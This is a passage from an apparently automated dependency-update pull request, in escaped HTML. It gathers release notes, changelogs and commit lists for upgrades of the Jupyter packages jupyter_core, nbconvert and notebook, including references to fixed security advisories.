href=\"https://github.com/jupyter/jupyter_core/compare/v5.7.0...8e69e7f1b856099c057e9711d5a439b33ef859d3\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDerive JupyterAsyncApp from JupyterApp \u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/pull/389\"\u003e#389\u003c/a\u003e (\u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_core/graphs/contributors?from=2024-01-03\u0026amp;to=2024-01-08\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_core+involves%3Ablink1073+updated%3A2024-01-03..2024-01-08\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e5.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/a8eac8cb0403e148880f1ae9e71dbb5db6451efe\"\u003e\u003ccode\u003ea8eac8c\u003c/code\u003e\u003c/a\u003e Release 4.11.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/1118c8ce01800cb689d51f655f5ccef19516e283\"\u003e\u003ccode\u003e1118c8c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-m678-f26j-3hrp\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/d3f61f336bfe5c6c63e1af0d8c9fb0dea59f8793\"\u003e\u003ccode\u003ed3f61f3\u003c/code\u003e\u003c/a\u003e Release 4.11.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/e7eeb9e9dcc3d139dcf22e8c683e709533e18444\"\u003e\u003ccode\u003ee7eeb9e\u003c/code\u003e\u003c/a\u003e Fix inclusion of jupyter file and check in CI (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/276\"\u003e#276\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/035bf1119a87dbd4a4510063826754b8c8a68b21\"\u003e\u003ccode\u003e035bf11\u003c/code\u003e\u003c/a\u003e Release 4.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/45aa28ba8bd3085f456da6ca363324deb427c8f0\"\u003e\u003ccode\u003e45aa28b\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/273\"\u003e#273\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/73401cc7c99c52822bc3f007652d67636297620d\"\u003e\u003ccode\u003e73401cc\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/272\"\u003e#272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/bc6b77133525e4a724eeee6e244e404161cf9e41\"\u003e\u003ccode\u003ebc6b771\u003c/code\u003e\u003c/a\u003e is_hidden: Use normalized paths (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/271\"\u003e#271\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/be38e5256e5bd562f46597bcae81df084a9c4598\"\u003e\u003ccode\u003ebe38e52\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/270\"\u003e#270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/jupyter_core/commit/7b790d8b6bbaf7966061ff1d6efa53b450aa2958\"\u003e\u003ccode\u003e7b790d8\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jupyter/jupyter_core/issues/269\"\u003e#269\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jupyter/jupyter_core/compare/4.6.3...4.11.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nbconvert` from 5.6.1 to 6.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/nbconvert/releases\"\u003enbconvert's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eRelease 6.5.1\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003e6.5.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop dependency on testpath. by \u003ca href=\"https://github.com/anntzer\"\u003e\u003ccode\u003e@​anntzer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1723\"\u003ejupyter/nbconvert#1723\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdopt pre-commit by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1744\"\u003ejupyter/nbconvert#1744\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd pytest settings and handle warnings by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1745\"\u003ejupyter/nbconvert#1745\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eApply Autoformatters by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1746\"\u003ejupyter/nbconvert#1746\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd git-blame-ignore-revs by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1748\"\u003ejupyter/nbconvert#1748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate flake8 config by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1749\"\u003ejupyter/nbconvert#1749\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003esupport bleach 5, add packaging and tinycss2 dependencies by \u003ca href=\"https://github.com/bollwyvl\"\u003e\u003ccode\u003e@​bollwyvl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1755\"\u003ejupyter/nbconvert#1755\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1752\"\u003ejupyter/nbconvert#1752\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate cli example by \u003ca href=\"https://github.com/leahecole\"\u003e\u003ccode\u003e@​leahecole\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1753\"\u003ejupyter/nbconvert#1753\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClean up pre-commit by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1757\"\u003ejupyter/nbconvert#1757\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClean up workflows by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1750\"\u003ejupyter/nbconvert#1750\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1752\"\u003ejupyter/nbconvert#1752\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/nbconvert/compare/6.4.5...6.5\"\u003ehttps://github.com/jupyter/nbconvert/compare/6.4.5...6.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e6.4.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd section to \u003ccode\u003ecustomizing\u003c/code\u003e showing how to use template inheritance by \u003ca href=\"https://github.com/stefanv\"\u003e\u003ccode\u003e@​stefanv\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1719\"\u003ejupyter/nbconvert#1719\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove ipython genutils by \u003ca href=\"https://github.com/rgs258\"\u003e\u003ccode\u003e@​rgs258\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1727\"\u003ejupyter/nbconvert#1727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate changelog for 6.4.3 by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1728\"\u003ejupyter/nbconvert#1728\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/stefanv\"\u003e\u003ccode\u003e@​stefanv\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1719\"\u003ejupyter/nbconvert#1719\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rgs258\"\u003e\u003ccode\u003e@​rgs258\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1727\"\u003ejupyter/nbconvert#1727\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/nbconvert/compare/6.4.2...6.4.3\"\u003ehttps://github.com/jupyter/nbconvert/compare/6.4.2...6.4.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e6.4.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eOptionally speed up validation by \u003ca href=\"https://github.com/gwincr11\"\u003e\u003ccode\u003e@​gwincr11\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1672\"\u003ejupyter/nbconvert#1672\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdding missing div compared to JupyterLab DOM structure by \u003ca href=\"https://github.com/SylvainCorlay\"\u003e\u003ccode\u003e@​SylvainCorlay\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1678\"\u003ejupyter/nbconvert#1678\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow passing extra args to code highlighter by \u003ca href=\"https://github.com/yuvipanda\"\u003e\u003ccode\u003e@​yuvipanda\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1683\"\u003ejupyter/nbconvert#1683\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrevent page breaks in outputs when printing by \u003ca href=\"https://github.com/SylvainCorlay\"\u003e\u003ccode\u003e@​SylvainCorlay\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1679\"\u003ejupyter/nbconvert#1679\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd collapsers to template by \u003ca href=\"https://github.com/SylvainCorlay\"\u003e\u003ccode\u003e@​SylvainCorlay\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1689\"\u003ejupyter/nbconvert#1689\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix recent pandoc latex tables by adding calc and array (\u003ca href=\"https://redirect.github.com/jupyter/nbconvert/issues/1536\"\u003e#1536\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/issues/1566\"\u003e#1566\u003c/a\u003e) by \u003ca href=\"https://github.com/cgevans\"\u003e\u003ccode\u003e@​cgevans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1686\"\u003ejupyter/nbconvert#1686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd an invalid notebook error by \u003ca href=\"https://github.com/gwincr11\"\u003e\u003ccode\u003e@​gwincr11\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1675\"\u003ejupyter/nbconvert#1675\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typos in execute.py by \u003ca href=\"https://github.com/TylerAnderson22\"\u003e\u003ccode\u003e@​TylerAnderson22\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1692\"\u003ejupyter/nbconvert#1692\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eModernize latex greek math handling (partially fixes \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/issues/1673\"\u003e#1673\u003c/a\u003e) by \u003ca href=\"https://github.com/cgevans\"\u003e\u003ccode\u003e@​cgevans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1687\"\u003ejupyter/nbconvert#1687\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix use of deprecated API and update test matrix by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1696\"\u003ejupyter/nbconvert#1696\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate nbconvert_library.ipynb by \u003ca href=\"https://github.com/letterphile\"\u003e\u003ccode\u003e@​letterphile\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1695\"\u003ejupyter/nbconvert#1695\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eChangelog for 6.4 by \u003ca href=\"https://github.com/blink1073\"\u003e\u003ccode\u003e@​blink1073\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/1697\"\u003ejupyter/nbconvert#1697\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/nbconvert/blob/main/CHANGELOG.md\"\u003enbconvert's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChanges in nbconvert\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e7.16.6\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/nbconvert/compare/v7.16.5...01c6ab25ec81277ab4d8585747f904c89a8c02b0\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePrevent leading whitespace in markdown code blocks from being stripped \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2203\"\u003e#2203\u003c/a\u003e (\u003ca href=\"https://github.com/peytondmurray\"\u003e\u003ccode\u003e@​peytondmurray\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix bullet list parsing in markdown \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2177\"\u003e#2177\u003c/a\u003e (\u003ca href=\"https://github.com/douglas-raillard-arm\"\u003e\u003ccode\u003e@​douglas-raillard-arm\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when running with optimization \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2160\"\u003e#2160\u003c/a\u003e (\u003ca href=\"https://github.com/QuLogic\"\u003e\u003ccode\u003e@​QuLogic\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eremove any twitter mention \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2206\"\u003e#2206\u003c/a\u003e (\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate base.tex.j2 for macro compatibility with newer versions of Pandoc \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2196\"\u003e#2196\u003c/a\u003e (\u003ca href=\"https://github.com/PetalAdrift\"\u003e\u003ccode\u003e@​PetalAdrift\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/nbconvert/graphs/contributors?from=2025-01-02\u0026amp;to=2025-01-28\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3ACarreau+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3Adouglas-raillard-arm+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​douglas-raillard-arm\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3Agabemorris12+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​gabemorris12\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3Akrassowski+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​krassowski\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3APetalAdrift+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​PetalAdrift\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3Apeytondmurray+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​peytondmurray\u003c/code\u003e\u003c/a\u003e | \u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fnbconvert+involves%3AQuLogic+updated%3A2025-01-02..2025-01-28\u0026amp;type=Issues\"\u003e\u003ccode\u003e@​QuLogic\u003c/code\u003e\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e7.16.5\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/nbconvert/compare/v7.16.4...18e10f6484afdfee39105248c28abe5ef0835b22\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eEnhancements made\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for mistune 3.1.0 \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2199\"\u003e#2199\u003c/a\u003e (\u003ca href=\"https://github.com/fcollonval\"\u003e\u003ccode\u003e@​fcollonval\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllow including \u003ccode\u003etext/x-rst\u003c/code\u003e outputs in rst conversion, transition away from \u003ccode\u003etext/restructuredtext\u003c/code\u003e \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2167\"\u003e#2167\u003c/a\u003e (\u003ca href=\"https://github.com/takluyver\"\u003e\u003ccode\u003e@​takluyver\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDo not display mathjax overlay \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2181\"\u003e#2181\u003c/a\u003e (\u003ca href=\"https://github.com/timkpaine\"\u003e\u003ccode\u003e@​timkpaine\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eWork around pip 24.1 bug which prevents installing pandocfilters 1.4.1 \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2168\"\u003e#2168\u003c/a\u003e (\u003ca href=\"https://github.com/takluyver\"\u003e\u003ccode\u003e@​takluyver\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't die if template path cannot be read \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2162\"\u003e#2162\u003c/a\u003e (\u003ca href=\"https://github.com/stuaxo\"\u003e\u003ccode\u003e@​stuaxo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix markdown2asciidoc function for pandoc \u0026gt;= 3.0 (closes \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/issues/2017\"\u003e#2017\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2152\"\u003e#2152\u003c/a\u003e (\u003ca href=\"https://github.com/thomasjm\"\u003e\u003ccode\u003e@​thomasjm\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eenhancement dep-chain: directly depend on bleach[css], instead of pulling in tinycss2. \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2166\"\u003e#2166\u003c/a\u003e (\u003ca href=\"https://github.com/xiacunshun\"\u003e\u003ccode\u003e@​xiacunshun\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echore: update pre-commit hooks \u003ca href=\"https://redirect.github.com/jupyter/nbconvert/pull/2146\"\u003e#2146\u003c/a\u003e (\u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/7471b75a506b2fec776613e50e4f2234b97f3c8e\"\u003e\u003ccode\u003e7471b75\u003c/code\u003e\u003c/a\u003e Release 6.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/c1943e0e9fd0ad6abd7d8dae380474cca4b04a31\"\u003e\u003ccode\u003ec1943e0\u003c/code\u003e\u003c/a\u003e Fix pre-commit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/8685e9378086e8d82a0df92505fe386095f929ad\"\u003e\u003ccode\u003e8685e93\u003c/code\u003e\u003c/a\u003e Fix tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/0abf2906bc6c7170c8d70bc0df6995d21c5aeaf1\"\u003e\u003ccode\u003e0abf290\u003c/code\u003e\u003c/a\u003e Run black and prettier\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/418d545ae596d95f5ea82d141c68fd1abc99f1a6\"\u003e\u003ccode\u003e418d545\u003c/code\u003e\u003c/a\u003e Run test on 6.x branch\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/bef65d7ab2a469b01e4aa25f44c0f20326f7c7c5\"\u003e\u003ccode\u003ebef65d7\u003c/code\u003e\u003c/a\u003e Convert input to string prior to escape HTML\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/0818628718c4a5d3ddd671fbd4881bf176e7d6e2\"\u003e\u003ccode\u003e0818628\u003c/code\u003e\u003c/a\u003e Check input type before escaping\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/b206470f9ecd71b006a37dd1298dd3d9e3dd46dd\"\u003e\u003ccode\u003eb206470\u003c/code\u003e\u003c/a\u003e GHSL-2021-1017, GHSL-2021-1020, GHSL-2021-1021\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/a03cbb8a8d04d47aefec51e7b1b816045682aed5\"\u003e\u003ccode\u003ea03cbb8\u003c/code\u003e\u003c/a\u003e GHSL-2021-1026, GHSL-2021-1025\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jupyter/nbconvert/commit/48fe71eb3335caf4e03166e56e0d16efcfbeaf44\"\u003e\u003ccode\u003e48fe71e\u003c/code\u003e\u003c/a\u003e GHSL-2021-1024\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jupyter/nbconvert/compare/5.6.1...6.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `notebook` from 6.0.3 to 6.4.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/notebook/releases\"\u003enotebook's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e6.4.12\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAddress security advisory \u003ca href=\"https://github.com/jupyter/notebook/security/advisories/GHSA-v7vq-3x77-87vg\"\u003eGHSA-v7vq-3x77-87vg\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jupyter/notebook/compare/v6.4.11...6.4.12\"\u003ehttps://github.com/jupyter/notebook/compare/v6.4.11...6.4.12\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev6.4.11\u003c/h2\u003e\n\u003ch2\u003e6.4.11\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/notebook/compare/6.4.10...3911672959fcd35cf4a1b1ad7c9c8a5651c17ae6\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate further to ipykernel comm refactoring \u003ca href=\"https://redirect.github.com/jupyter/notebook/pull/6358\"\u003e#6358\u003c/a\u003e (\u003ca href=\"https://github.com/echarles\"\u003e\u003ccode\u003e@​echarles\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd testpath to the test dependencies. \u003ca 